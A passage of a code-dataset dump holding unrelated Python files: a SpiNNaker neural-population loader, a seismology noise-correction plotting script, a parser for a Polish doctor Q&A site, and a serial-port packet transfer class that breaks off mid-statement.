num_analogue_rec_regions = Regions.analogue_recording_end -\\\n Regions.analogue_recording_start\n assert num_analogue_rec_regions >= (len(cell_type.recordable) - 1)\n\n # Loop through cell's non-spike recordables\n # and create analogue recording regions\n # **HACK** this assumes the first entry is spike\n for i, v in enumerate(cell_type.recordable[1:]):\n self.regions[Regions(Regions.analogue_recording_start + i)] =\\\n regions.AnalogueRecording(indices_to_record, v,\n record_sample_interval,\n sim_timestep_ms, sim_ticks)\n\n # Add profiler region if required\n if config.num_profile_samples is not None:\n self.regions[Regions.profiler] =\\\n Profiler(config.num_profile_samples)\n\n # Split population slice\n neuron_slices = split_slice(pop_size, post_synaptic_width)\n\n # Build neuron vertices for each slice,\n # allocating a keyspace for each vertex\n self.verts = [Vertex(keyspace, neuron_slice, pop_id, vert_id)\n for vert_id, neuron_slice in enumerate(neuron_slices)]\n\n # Get neuron executable name\n neuron_app = get_model_executable_filename(\n \"neuron_\", cell_type, config.num_profile_samples is not None)\n\n logger.debug(\"\\t\\tNeuron application:%s\", neuron_app)\n logger.debug(\"\\t\\t%u neuron vertices\", len(self.verts))\n\n # Loop through neuron vertices and their corresponding resources\n for v in self.verts:\n # Add application to dictionary\n vertex_run_applications[v] = neuron_app\n\n # Estimate SDRAM usage and check\n # it's an integer as otherwise C CSA fails\n sdram = self._estimate_sdram(v.neuron_slice)\n assert isinstance(sdram, int)\n\n logger.debug(\"\\t\\t\\tVertex %s: %u bytes SDRAM\", v, sdram)\n\n # Add resources to dictionary\n vertex_resources[v] = {machine.Cores: 1, 
machine.SDRAM: sdram}\n\n    # --------------------------------------------------------------------------\n    # Public methods\n    # --------------------------------------------------------------------------\n    def allocate_out_buffers(self, placements, allocations,\n                             machine_controller):\n        # Loop through vertices\n        for v in self.verts:\n            # Get placement and allocation\n            vertex_placement = placements[v]\n            vertex_allocation = allocations[v]\n\n            # Get core this vertex should be run on\n            core = vertex_allocation[machine.Cores]\n            assert (core.stop - core.start) == 1\n\n            logger.debug(\"\\t\\tVertex %s (%u, %u, %u)\",\n                         v, vertex_placement[0], vertex_placement[1],\n                         core.start)\n\n            # Select placed chip\n            with machine_controller(x=vertex_placement[0],\n                                    y=vertex_placement[1]):\n                # If back propagation is enabled, allocate two back\n                # propagation out buffers for this neuron vertex\n                if self.regions[Regions.back_prop_output].enabled:\n                    back_prop_buffer_bytes =\\\n                        calc_slice_bitfield_words(v.neuron_slice) * 4\n                    v.back_prop_out_buffers = [\n                        machine_controller.sdram_alloc(back_prop_buffer_bytes,\n                                                       clear=True)\n                        for _ in range(2)]\n\n    def load(self, placements, allocations, machine_controller):\n        # Loop through vertices\n        for v in self.verts:\n            # Get placement and allocation\n            vertex_placement = placements[v]\n            vertex_allocation = allocations[v]\n\n            # Get core this vertex should be run on\n            core = vertex_allocation[machine.Cores]\n            assert (core.stop - core.start) == 1\n\n            logger.debug(\"\\t\\t\\tVertex %s (%u, %u, %u): Spike key:%08x, Flush key:%08x\",\n                         v, vertex_placement[0], vertex_placement[1],\n                         core.start, v.spike_tx_key, v.flush_tx_key)\n\n            # Select placed chip\n            with machine_controller(x=vertex_placement[0],\n                                    y=vertex_placement[1]):\n                # Get the input buffers from each synapse vertex\n                in_buffers = [\n                    s.get_in_buffer(v.neuron_slice)\n                    for s in v.input_verts]\n\n                # Get region arguments\n                region_arguments = self._get_region_arguments(\n                    v.spike_tx_key, v.flush_tx_key, v.neuron_slice,\n                    in_buffers, v.back_prop_out_buffers)\n\n                # Load regions\n                v.region_memory = load_regions(self.regions, region_arguments,\n                                               machine_controller, core,\n                                               logger)\n\n    def read_recorded_spikes(self):\n        # Loop through all neuron vertices and read spike times into dictionary\n        spike_times = {}\n        region = self.regions[Regions.spike_recording]\n        for v in self.verts:\n            region_mem = v.region_memory[Regions.spike_recording]\n            spike_times.update(region.read_spike_times(v.neuron_slice,\n                                                       region_mem))\n        return spike_times\n\n    def read_recorded_signal(self, channel):\n        # Get index of channel's analogue recording region\n        region_index = Regions(Regions.analogue_recording_start + channel)\n        region = self.regions[region_index]\n\n        # Loop through all neuron vertices and read signal\n        signal = {}\n        for v in self.verts:\n            region_mem = v.region_memory[region_index]\n            signal.update(region.read_signal(v.neuron_slice, region_mem))\n\n        return signal\n\n    def read_profile(self):\n        # Get the profile recording region\n        region = self.regions[Regions.profiler]\n\n        # Return profile data for each vertex that makes up population\n        return [(v.neuron_slice.python_slice,\n                 region.read_profile(v.region_memory[Regions.profiler],\n                                     self.profiler_tag_names))\n                for v in self.verts]\n\n    def read_statistics(self):\n        # Get the statistics recording region\n        region = self.regions[Regions.statistics]\n\n        # Read stats from all vertices\n        return region.read_stats(\n            [v.region_memory[Regions.statistics] for v in self.verts],\n            self.statistic_names)\n\n    # 
--------------------------------------------------------------------------\n # Private methods\n # --------------------------------------------------------------------------\n def _estimate_sdram(self, vertex_slice):\n # Begin with size of spike recording region\n sdram = self.regions[Regions.spike_recording].sizeof(vertex_slice);\n\n # Add on size of neuron region\n sdram += self.regions[Regions.neuron].sizeof(vertex_slice)\n \n # If profiler region exists, add its size\n if Regions.profiler in self.regions:\n sdram += self.regions[Regions.profiler].sizeof()\n\n # Loop through possible analogue recording regions\n for t in range(Regions.analogue_recording_start,\n Regions.analogue_recording_end):\n # If region exists, add its size to total\n if Regions(t) in self.regions:\n sdram += self.regions[Regions(t)].sizeof(vertex_slice)\n\n return sdram\n\n def _get_region_arguments(self, spike_tx_key, flush_tx_key, vertex_slice,\n in_buffers, back_prop_out_buffers):\n region_arguments = defaultdict(Args)\n\n analogue_recording_regions = range(Regions.analogue_recording_start,\n Regions.analogue_recording_end)\n # Add vertex slice to regions that require it\n for r in itertools.chain((Regions.neuron,\n Regions.synapse,\n Regions.spike_recording),\n analogue_recording_regions):\n region_arguments[r] = Args(vertex_slice)\n\n # Add kwargs for regions that require them\n region_arguments[Regions.system].kwargs[\"application_words\"] =\\\n [spike_tx_key, flush_tx_key, len(vertex_slice)]\n region_arguments[Regions.input_buffer].kwargs[\"in_buffers\"] =\\\n in_buffers\n region_arguments[Regions.back_prop_output].kwargs[\"out_buffers\"] =\\\n back_prop_out_buffers\n return region_arguments\n","repo_name":"project-rig/pynn_spinnaker","sub_path":"pynn_spinnaker/spinnaker/neural_cluster.py","file_name":"neural_cluster.py","file_ext":"py","file_size_in_byte":16750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21530879637","text":"#!/usr/bin/env python\nfrom obspy.core import UTCDateTime\nfrom obspy.clients.fdsn import Client\nfrom obspy.signal.spectral_estimation import get_nlnm, get_nhnm\nfrom scipy.optimize import fmin\nfrom scipy import signal\nimport matplotlib.pyplot as plt\nimport numpy as np\nstime = UTCDateTime('2019-271T00:00:00')\netime = stime + 1*24*60*60\n\n# This code generates figure 2 of Ringler et al. 
magnetic paper.\n\nimport matplotlib as mpl\nmpl.rc('font',family='serif')\nmpl.rc('font',serif='Times')\n#mpl.rc('text', usetex=True)\nmpl.rc('font',size=16)\n\nchans = ['LH1', 'LH2', 'LHZ']\nlocs = ['10', '00']\nfig = plt.figure(2, figsize=(16,16))\nfor idx, loc in enumerate(locs):\n plt.subplot(2,2,2*idx+1)\n for chan in chans:\n\n #net, sta, loc, chan = 'TA', 'H22K', '*', 'LHZ'\n net, sta = 'IU', 'COLA'\n\n pmax = 1./2000.\n pmin = 1./10.\n\n client = Client()\n st = client.get_waveforms(net, sta, loc,\n chan, stime, etime, attach_response = True)\n #st = read(\"/msd/\" + net + '_' + sta + '/' + str(ctime.year) + \"/\" +\n # str(ctime.julday).zfill(3) + \"/\"+ loc + \"_\" + chan + \"*\")\n\n stR = st.copy()\n stR.detrend('constant')\n st += client.get_waveforms(\"IU\", \"COLA\", \"*\",\n \"LF*\", stime, etime, attach_response = True)\n #st += read(\"/msd/\" + net + '_' + sta + '/' + str(ctime.year) + \"/\" +\n # str(ctime.julday).zfill(3) + \"/40_LF*\")\n st.detrend('constant')\n st.merge(fill_value=0)\n if loc == '10':\n paz = {'poles': [-0.037+0.037j, -0.037-0.037j], 'zeros': [0j], 'gain':1., 'sensitivity': 1.}\n else:\n paz = {'poles': [-0.01234+0.01234j, -0.01234-0.01234j], 'zeros': [0j], 'gain':1., 'sensitivity': 1.}\n #inv = read_inventory(\"/APPS/metadata/RESPS/RESP.\" + net + \".\" + sta + \".\" +\n # \"00.\" + chan)\n # The magnetic field is now interms of m/s/s/nT normalized\n for tr in st.select(location='40'):\n tr.simulate(paz_simulate=paz)\n\n # Filter and then estimate coefficents\n st.filter('bandpass', freqmin=pmax, freqmax=pmin)\n #st.normalize()\n\n\n def resi_fun(x):\n data = st.select(location=loc, channel=chan)[0].data.copy()\n for idx, tr in enumerate(st.select(location='40')):\n data -= x[idx]*tr.data.copy()\n return np.sum(data**2)/len(data)\n\n sol = fmin(resi_fun, [1., 1., 1.])\n\n\n\n def correct(x):\n data = st.select(location=loc, channel=chan)[0].data.copy()\n for idx, tr in enumerate(st.select(location='40')):\n data -= x[idx]*tr.data.copy()\n return data\n\n print(sol)\n print(resi_fun([0., 0., 0.]))\n print(resi_fun(sol))\n\n reduction = 100.*(resi_fun(sol) - resi_fun([0., 0., 0.]))/resi_fun([0., 0., 0.])\n print(chan + ' variance reduction')\n print(reduction)\n\n\n\n tr = st.select(location=loc, channel=chan)[0]\n times = tr.times()/(24*60*60)\n # plt.subplot(2,1,1)\n # plt.plot(times, tr.data,label = tr.id, alpha=0.5)\n # plt.plot(times, correct(sol),label = 'Magnetic Field Corrected', alpha=0.5)\n # plt.xlim((min(times), max(times)))\n # plt.legend()\n # plt.subplot(2,1,2)\n # for tr in st.select(location='40'):\n # plt.plot(times, tr.data,label = tr.id, alpha=0.5)\n # plt.xlim((min(times), max(times)))\n # plt.legend()\n\n # plt.savefig('Timeseries' + chan + '.png', format='PNG')\n # plt.show()\n # plt.clf()\n # plt.close()\n\n NFFT=2*2*4096\n\n\n def correct2(x):\n data = stR.select(location=loc, channel=chan)[0].data.copy()\n print(data)\n for idx, tr in enumerate(st.select(location='40')):\n data -= x[idx]*tr.data.copy()\n return data\n\n\n\n data2 = correct2(sol)\n\n print(data2)\n\n\n tr = stR.select(location=loc, channel=chan)[0]\n f, p = signal.welch(tr.data, fs = tr.stats.sampling_rate,\n nperseg=NFFT, noverlap=256)\n print(tr)\n amp, f= tr.stats.response.get_evalresp_response(tr.stats.delta, NFFT,\n output='ACC')\n\n f, pcor = signal.welch(data2, fs = tr.stats.sampling_rate,\n nperseg=NFFT, noverlap=256)\n\n # (m/s^2)^2/Hz\n p /= np.abs(amp)**2\n p=10.*np.log10(p)\n pcor /= np.abs(amp)**2\n pcor = 10.*np.log10(pcor)\n\n\n\n\n 
plt.semilogx(1./f, pcor, label='Corr ' + tr.stats.station + ' ' + tr.stats.location + ' ' + chan)\n plt.semilogx(1./f,p, label='Raw ' + tr.stats.station + ' ' + tr.stats.location + ' ' + chan, alpha=0.7, linestyle='dotted', linewidth=3.5)\n per, nlnm = get_nlnm()\n per, nhnm = get_nhnm()\n bper, bpow =[], []\n fil = open('GSNHmodel.csv','r')\n for line in fil:\n line = line.strip()\n line = line.replace(' ','')\n line = line.split(',')\n bper.append(float(line[0]))\n bpow.append(float(line[1]))\n fil.close()\n plt.semilogx(per, nlnm, color='k', linewidth=2)\n plt.semilogx(per, nhnm, color='k', linewidth=2, label='NLNM/NHNM')\n plt.semilogx(bper, bpow, color='.7', linewidth=2, label='GSNHM')\n #plt.axvspan(1./pmin, 1./pmax, facecolor='g', alpha=0.1)\n plt.fill_between(1./f, p, pcor,color='.5', alpha=0.7)\n plt.xlabel('Period (s)')\n plt.ylabel('PSD (dB rel. 1 $(m/s^2)^2/Hz$)', fontsize=16)\n plt.xlim((2., 1000.))\n plt.ylim((-190, -90))\n plt.legend(loc=9, ncol=2, fontsize=14)\n if idx == 0:\n plt.text(1., -85, '(a)', fontsize=18)\n else:\n plt.text(1., -85, '(c)', fontsize=18)\n\n if chan == 'LHZ':\n plt.subplot(2,2,2*idx+2)\n plt.semilogx(1./f, pcor, color = 'C4', label='Corr ' + tr.stats.station + ' ' + tr.stats.location + ' ' + chan)\n plt.semilogx(1./f,p, color = 'C5', label='Raw ' + tr.stats.station + ' ' + tr.stats.location + ' ' + chan, alpha=0.7, linestyle='dotted', linewidth=3.5) \n plt.semilogx(per, nlnm, color='k', linewidth=2)\n plt.semilogx(per, nhnm, color='k', linewidth=2, label='NLNM/NHNM')\n plt.semilogx(bper, bpow, color='.7', linewidth=2, label='GSNHM')\n #plt.axvspan(1./pmin, 1./pmax, facecolor='g', alpha=0.1)\n plt.fill_between(1./f, p, pcor,color='.5', alpha=0.7)\n plt.xlabel('Period (s)')\n plt.ylabel('PSD (dB rel. 1 $(m/s^2)^2/Hz$)', fontsize=16)\n plt.xlim((50., 1000.))\n plt.ylim((-190, -140))\n #plt.legend(loc=9, ncol=2, fontsize=14)\n if idx == 0:\n plt.text(30., -137, '(b)', fontsize=18)\n else:\n plt.text(30., -137, '(d)', fontsize=18)\n\n\nplt.savefig('figure2.png', format='PNG', dpi=200)\nplt.savefig('figure2.pdf', format='PDF', dpi=600)\n#plt.show()\n","repo_name":"aringler-usgs/magnetic_field","sub_path":"figure2.py","file_name":"figure2.py","file_ext":"py","file_size_in_byte":6942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20808488206","text":"#!/usr/bin/env python3\n\nfrom bs4 import BeautifulSoup\nfrom bs4.element import Tag\n\nfrom urllib.parse import urlparse\nimport os\n\nBASE_URL = \"https://www.znanylekarz.pl\"\nQA_DOC_URL_TEMPLATE = \"https://www.znanylekarz.pl/pytania-i-odpowiedzi/%s\"\nQA_URL_PREFIX = \"https://www.znanylekarz.pl/pytania-odpowiedzi\"\n\ndef parse_doctors_qa_urls(html_text):\n \"\"\"\n Parse doctor q&a page urls from doctor list\n\n div with dp-doctor-card class\n div with media-body class\n a with znanylekarz href\n \"\"\"\n\n dom = BeautifulSoup(html_text, \"html.parser\")\n cards = dom.find_all(\"div\", class_=\"dp-doctor-card\")\n media_bodies = [mb for card in cards for mb in card.find_all(\"div\", class_=\"media-body\")]\n urls = [a[\"href\"] for mb in media_bodies for a in mb.find_all(\"a\", href=lambda attr: attr is not None and attr.startswith(BASE_URL))]\n usernames = set()\n for url in urls:\n path = urlparse(url).path\n if len(path) == 0:\n continue\n path_components = path[1:].split(\"/\")\n if len(path_components) != 0:\n usernames.add(path_components[0])\n\n urls = [QA_DOC_URL_TEMPLATE % user for user in usernames]\n return urls\n\ndef 
parse_qa_urls(html_text):\n \"\"\"\n Parse question urls from znanylekarz.pl/pytania-i-odpowiedzi/\n\n a tag with href starting with znanylekarz.pl/pytania-odpowiedzi\n \"\"\"\n\n dom = BeautifulSoup(html_text, \"html.parser\")\n bodies = dom.find_all(\"p\", class_=\"question-body\")\n links = [a for body in bodies for a in body.find_all(\"a\", href=lambda attr: attr is not None and attr.startswith(QA_URL_PREFIX))]\n urls = [link[\"href\"] for link in links]\n\n return urls\n\ndef parse_qa(url, html_text):\n \"\"\"\n PYTANIA I ODPOWIEDZI\n div doctor-question-body - question\n child of div doctor-answer-content - answer\n \"\"\"\n QUESTION_CLASS = \"doctor-question-body\"\n ANSWER_CLASS = \"doctor-answer-content\"\n dom = BeautifulSoup(html_text, \"html.parser\")\n question_divs = dom.find_all(\"div\", class_=QUESTION_CLASS)\n answer_divs = dom.find_all(\"div\", class_=ANSWER_CLASS)\n\n data = []\n _, path = os.path.split(url)\n for i, div in enumerate(question_divs):\n row = {\n \"id\": f\"q{i}_{path}\",\n \"url\": url,\n \"text\": div.get_text().strip(),\n \"type\": \"question\"\n }\n data.append(row)\n\n for i, div in enumerate(answer_divs):\n children = [child for child in div.children if type(child) == Tag]\n\n for child in children:\n row = {\n \"id\": f\"a{i}_{path}\",\n \"url\": url,\n \"text\": child.get_text().strip(),\n \"type\": \"answer\"\n }\n data.append(row)\n\n return data\n","repo_name":"BlonskiP/PWR-Datascience-projects-exercises","sub_path":"Social media analysis/project-medical_sma/scraper/src/znanylekarz/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7205166321","text":"\r\nimport time\r\nimport serial\r\nimport thread\r\nimport os\r\nimport struct\r\n\r\nPACKET_OFFSET_ID = 0\r\nPACKET_OFFSET_TYPE = 1\r\nPACKET_OFFSET_PID = 2\r\nPACKET_OFFSET_SEQ = 3\r\nPACKET_OFFSET_CNT = 3\r\nPACKET_HEADER_LEN = 4\r\n#PACKET_OFFSET_CRC = 254\r\nPACKET_OFFSET_CRC = 1022\r\n#PACKET_LEN = 256\r\nPACKET_LEN = 1024\r\nCRC_LEN = 2\r\nPACKET_DATA_LEN = PACKET_LEN - PACKET_HEADER_LEN - CRC_LEN\r\n\r\nPACKET_TYPE_REQ = 0 # request data packet\r\nPACKET_TYPE_REPLY = 1 #reply packet\r\nPACKET_TYPE_ACK = 2 # acknowledge pacekt\r\nPACKET_TYPE_DATA = 3 # data packet\r\nPACKET_TYPE_QUIT = 4 # quit transfer\r\n\r\nGET_PACKET_STATE_IDLE = 0\r\nGET_PACKET_STATE_REQ = 1 \r\nGET_PACKET_STATE_WAIT_REPLY = 2 \r\nGET_PACKET_STATE_RECEIVE_DATA = 3 \r\nGET_PACKET_STATE_SEND_ACK = 4 \r\nGET_PACKET_STATE_QUIT = 5 \r\n\r\nSEND_PACKET_STATE_IDLE = 0\r\nSEND_PACKET_STATE_REPLY = 1 \r\nSEND_PACKET_STATE_SEND = 2 \r\nSEND_PACKET_STATE_WAIT_ACK = 3 \r\nSEND_PACKET_STATE_TIMEOUT = 4 \r\nSEND_PACKET_STATE_QUIT = 5 \r\n\r\n\r\ndef setup_packet_offset_dict(po_str):\r\n po_str[PACKET_OFFSET_ID] = \"PACKET_OFFSET_ID\"\r\n po_str[PACKET_OFFSET_TYPE] = \"PACKET_OFFSET_TYPE\"\r\n po_str[PACKET_OFFSET_PID] = \"PACKET_OFFSET_PID\"\r\n po_str[PACKET_OFFSET_SEQ] = \"PACKET_OFFSET_SEQ\"\r\n po_str[PACKET_OFFSET_CRC] = \"PACKET_OFFSET_CRC\"\r\n\r\ndef setup_packet_type_dict(pt_str):\r\n pt_str[PACKET_TYPE_REQ] = \"PACKET_TYPE_REQ\"\r\n pt_str[PACKET_TYPE_REPLY] = \"PACKET_TYPE_REPLY\"\r\n pt_str[PACKET_TYPE_ACK] = \"PACKET_TYPE_ACK\"\r\n pt_str[PACKET_TYPE_DATA] = \"PACKET_TYPE_DATA\"\r\n pt_str[PACKET_TYPE_QUIT] = \"PACKET_TYPE_QUIT\"\r\n\r\ndef setup_get_packet_state_dict(gps_str):\r\n gps_str[GET_PACKET_STATE_IDLE] = \"GET_PACKET_STATE_IDLE\"\r\n gps_str[GET_PACKET_STATE_REQ] = 
\"GET_PACKET_STATE_REQ\"\r\n gps_str[GET_PACKET_STATE_WAIT_REPLY] = \"GET_PACKET_STATE_WAIT_REPLY\"\r\n gps_str[GET_PACKET_STATE_RECEIVE_DATA] = \"GET_PACKET_STATE_RECEIVE_DATA\"\r\n gps_str[GET_PACKET_STATE_SEND_ACK] = \"GET_PACKET_STATE_SEND_ACK\"\r\n gps_str[GET_PACKET_STATE_QUIT] = \"GET_PACKET_STATE_QUIT\"\r\n\r\ndef setup_send_packet_state_dict(sps_str):\r\n sps_str[SEND_PACKET_STATE_IDLE] = \"SEND_PACKET_STATE_IDLE\"\r\n sps_str[SEND_PACKET_STATE_REPLY] = \"SEND_PACKET_STATE_REPLY\"\r\n sps_str[SEND_PACKET_STATE_SEND] = \"SEND_PACKET_STATE_SEND\"\r\n sps_str[SEND_PACKET_STATE_WAIT_ACK] = \"SEND_PACKET_STATE_WAIT_ACK\"\r\n sps_str[SEND_PACKET_STATE_TIMEOUT] = \"SEND_PACKET_STATE_TIMEOUT\"\r\n sps_str[SEND_PACKET_STATE_QUIT] = \"SEND_PACKET_STATE_QUIT\"\r\n\r\n \r\nclass xocket(object):\r\n\r\n def __init__(self, dev = \"/dev/tty/USB0\", baudrate = 115200, my_board_id = 0, target_board_id = 1, pid = 0, packet_len = 1024, out_file = \"log.txt\"):\r\n self.dev = dev\r\n self.baudrate = baudrate\r\n self.my_board_id = my_board_id\r\n self.target_board_id = target_board_id\r\n self.packet_len = packet_len\r\n self.out_file = out_file\r\n self.po_str = {}\r\n self.pt_str = {}\r\n self.gps_str = {}\r\n self.sps_str = {}\r\n self.pid = pid\r\n self.total_received_byres = 0\r\n self.total_send_bytes = 0\r\n self.receive_packet_done = False\r\n self.send_packet_done = False\r\n self.receive_state = GET_PACKET_STATE_IDLE\r\n self.send_state = SEND_PACKET_STATE_IDLE\r\n \r\n setup_packet_offset_dict(self.po_str)\r\n setup_packet_type_dict(self.pt_str)\r\n setup_send_packet_state_dict(self.sps_str)\r\n setup_get_packet_state_dict(self.gps_str)\r\n self.ser = serial.Serial(port = dev,\r\n baudrate = baudrate,\r\n parity = serial.PARITY_NONE,\r\n stopbits = serial.STOPBITS_ONE,\r\n bytesize = serial.EIGHTBITS,\r\n timeout = 1)\r\n\r\n ''' save msg to file '''\r\n def save_msg_to_file(self, msg):\r\n try:\r\n file = open(self.out_file, 'a+')\r\n file.write(msg)\r\n finally:\r\n file.close()\r\n\r\n\r\n def receive_packet(self):\r\n print(\"flyer get packet thread running\")\r\n self.receive_state = GET_PACKET_STATE_IDLE\r\n packet_total_cnt = 0\r\n packet_cnt = 0\r\n _packet_seq = 0\r\n packet_seq = 0\r\n\r\n cur_time = time.time()\r\n\r\n while True:\r\n ''' initial state, ready go! '''\r\n if (self.receive_state == GET_PACKET_STATE_IDLE):\r\n self.total_receive_bytes = 0\r\n self.receive_pacekt_done = False\r\n print(\"start to receive data...\")\r\n self.receive_state = GET_PACKET_STATE_REQ\r\n continue\r\n \r\n ''' request data from other side '''\r\n if (self.receive_state == GET_PACKET_STATE_REQ):\r\n print(\"flyer go into state GET_PACKET_STATE_REQ \")\r\n hdr = struct.pack('4B', self.target_board_id, PACKET_TYPE_REQ, self.pid, 0)\r\n\r\n packet = hdr + (PACKET_DATA_LEN + CRC_LEN) * '\\0'\r\n print (\"flyer wirte req packet len %d, target_board_id %d, type %s, pid %d,\"\r\n % (len(packet), self.target_board_id, self.pt_str[PACKET_TYPE_REQ], self.pid))\r\n print (\"write start...\")\r\n self.ser.write(packet)\r\n print(\"write done\")\r\n self.receive_state = GET_PACKET_STATE_WAIT_REPLY\r\n cur_time = time.time()\r\n continue\r\n\r\n ''' wait reply from other side '''\r\n if (self.receive_state == GET_PACKET_STATE_WAIT_REPLY):\r\n print (\"flyer go into state GET_PACKET_STATE_WAIT_REPLY\")\r\n if (cur_time + 10 < time.time()):\r\n print (\"flyer wait reply timeout 10sec... 
flyer goto state GET_PACKET_STATE_QUIT\")\r\n                    self.receive_state = GET_PACKET_STATE_QUIT\r\n                    continue\r\n\r\n                packet = self.ser.read(PACKET_LEN)\r\n                if (len(packet) < PACKET_LEN):\r\n                    continue\r\n\r\n                '''if (crc16_check(packet) == False):\r\n                    state = GET_PACKET_STATE_QUIT\r\n                    continue\r\n                '''\r\n\r\n                board_id, packet_type = struct.unpack('2B', packet[:PACKET_OFFSET_TYPE+1])\r\n                if (board_id != self.my_board_id or packet_type != PACKET_TYPE_REPLY):\r\n                    print(\"error! received packet len %d, board id: %d, expect id: %d \" %(len(packet), board_id, self.my_board_id))\r\n                    print (\"type: %d, expected type: %s\" %(packet_type, self.pt_str[PACKET_TYPE_REPLY]))\r\n                    self.receive_state = GET_PACKET_STATE_QUIT\r\n                    continue\r\n                \r\n                pid, packet_total_cnt = struct.unpack('2B', packet[PACKET_OFFSET_PID:PACKET_OFFSET_CNT+1])\r\n                if (packet_total_cnt <= 0 or pid != self.pid):\r\n                    print(\"receive reply from station, packet total cnt %d\" %(packet_total_cnt))\r\n                    self.receive_state = GET_PACKET_STATE_QUIT\r\n                    continue\r\n                \r\n                print(\"receive reply from station, board_id: %d, packet_type: %s, pid: %d, packet_total_cnt %d\"\r\n                      %(board_id, self.pt_str[packet_type], pid, packet_total_cnt))\r\n                \r\n                self.receive_state = GET_PACKET_STATE_SEND_ACK\r\n\r\n            ''' receive data state '''\r\n            if (self.receive_state == GET_PACKET_STATE_RECEIVE_DATA):\r\n                print (\"flyer go into state GET_PACKET_STATE_RECEIVE_DATA\")\r\n                packet = self.ser.read(PACKET_LEN)\r\n\r\n                if (len(packet) < 4):\r\n                    if (cur_time + 1 < time.time()):\r\n                        print (\"flyer receive data timeout 1sec...\")\r\n                    continue\r\n\r\n                board_id, packet_type = struct.unpack('2B', packet[:PACKET_OFFSET_TYPE+1])\r\n                if (board_id != self.my_board_id or packet_type != PACKET_TYPE_DATA):\r\n                    print(\"rcving error! packet id: %d, type %d, expect id: %d, type %s \"\r\n                          %(board_id, packet_type, self.my_board_id, self.pt_str[PACKET_TYPE_DATA]))\r\n                    self.receive_state = GET_PACKET_STATE_QUIT\r\n                    continue\r\n\r\n                pid, packet_seq = struct.unpack('2B', packet[PACKET_OFFSET_PID:PACKET_OFFSET_SEQ+1])\r\n                if (pid != self.pid or packet_seq != _packet_seq):\r\n                    print(\"rcving error! 
packet pid: %d, seq: %d, expected pid: %d, seq %d\" %(pid, packet_seq, self.pid, _packet_seq))\r\n                    self.receive_state = GET_PACKET_STATE_QUIT\r\n                    continue\r\n\r\n                print(\"receive data from station, board_id: %d, packet_type: %s, pid: %d, packet_seq %d\"\r\n                      %(board_id, self.pt_str[packet_type], pid, packet_seq))\r\n\r\n                msg = packet[PACKET_OFFSET_SEQ + 1: PACKET_LEN - CRC_LEN]\r\n\r\n                #print (\"#flyer recved len: %d, msg: %s\"\r\n                #       %(PACKET_LEN - CRC_LEN - PACKET_OFFSET_SEQ - 1, msg))\r\n\r\n                self.save_msg_to_file(packet[PACKET_OFFSET_SEQ+1: PACKET_LEN - CRC_LEN])\r\n                self.total_receive_bytes += len(packet)\r\n                _packet_seq += 1\r\n                self.receive_state = GET_PACKET_STATE_SEND_ACK\r\n\r\n\r\n            if (self.receive_state == GET_PACKET_STATE_SEND_ACK):\r\n                print (\"flyer go into state GET_PACKET_STATE_SEND_ACK \")\r\n                packet = struct.pack(\"4B\", self.target_board_id, PACKET_TYPE_ACK, self.pid, packet_seq)\r\n                \r\n                packet = packet + (PACKET_DATA_LEN + CRC_LEN - 4) * '1'\r\n                packet += \"phdc\"\r\n                print (\"flyer write ACK packet len %d, target_board_id %d, packet_type:%s, pid %d, _packet_seq %d,\"\r\n                       % (len(packet), self.target_board_id, self.pt_str[PACKET_TYPE_ACK], self.pid, packet_seq))\r\n\r\n                self.ser.write(packet)\r\n\r\n                if (_packet_seq == packet_total_cnt):\r\n                    print(\"flyer receive data ok, return\")\r\n                    ''' !!!delay for a while, waiting for the serial to send all the data out '''\r\n                    time.sleep(2)\r\n                    self.receive_packet_done = True\r\n                    \r\n                    return True\r\n                else:\r\n                    self.receive_state = GET_PACKET_STATE_RECEIVE_DATA\r\n                    continue\r\n\r\n\r\n            ''' end the transfer '''\r\n            if (self.receive_state == GET_PACKET_STATE_QUIT):\r\n                print (\"flyer go into GET_PACKET_STATE_QUIT\")\r\n                self.receive_packet_done = False\r\n                print (\"flyer_get_packet thread exit...\")\r\n                time.sleep(0.1)\r\n                return False\r\n\r\n\r\n    def receive_packet_is_done(self):\r\n        return self.receive_packet_done\r\n\r\n\r\n    def received_bytes(self):\r\n        return self.total_receive_bytes\r\n\r\n\r\n    def is_request_packet(self, packet):\r\n        board_id, packet_type = struct.unpack(\"2B\", packet[:PACKET_OFFSET_TYPE+1])\r\n        if (board_id != self.my_board_id or packet_type != PACKET_TYPE_REQ):\r\n            print (\"wrong packet,len %d, board id %d, type %d, expect board_id %d, packet_type %s\"\r\n                   %(len(packet), board_id, packet_type, self.my_board_id, self.pt_str[PACKET_TYPE_REQ])) \r\n            return False\r\n        else:\r\n            print(\"station receive one request packet, board_id %d, packet_type %s\"\r\n                  %(board_id, self.pt_str[packet_type]))\r\n            return True\r\n\r\n    ''' before going into send_packet, we have got pid and target board id from the request packet ''' \r\n    def send_packet(self, in_file_name, pid):\r\n        self.pid = pid\r\n        self.send_state = SEND_PACKET_STATE_REPLY\r\n        self.send_packet_done = False\r\n        sendfile = open(in_file_name, 'rb')\r\n        file_size = os.path.getsize(in_file_name)\r\n        packets_cnt = (file_size + PACKET_DATA_LEN - 1) / PACKET_DATA_LEN\r\n        send_packet_cnt = 0\r\n        last_packet_size = file_size % PACKET_DATA_LEN\r\n        print(\"file size %d, packets_cnt %d, last_packet_size %d\" %(file_size, packets_cnt, last_packet_size))\r\n        _packet_seq = 0\r\n\r\n        while True:\r\n            if (self.send_state == SEND_PACKET_STATE_REPLY):\r\n                print(\"station go into state SEND_PACKET_STATE_REPLY\")\r\n                packet = struct.pack(\"4B\", self.target_board_id, PACKET_TYPE_REPLY, self.pid, packets_cnt)\r\n                packet = packet + (PACKET_DATA_LEN + CRC_LEN) * '\\0'\r\n                print (\"station send packet len %d, target_board_id %d, type %s, pid %d, packets_cnt %d\"\r\n                       %(len(packet), 
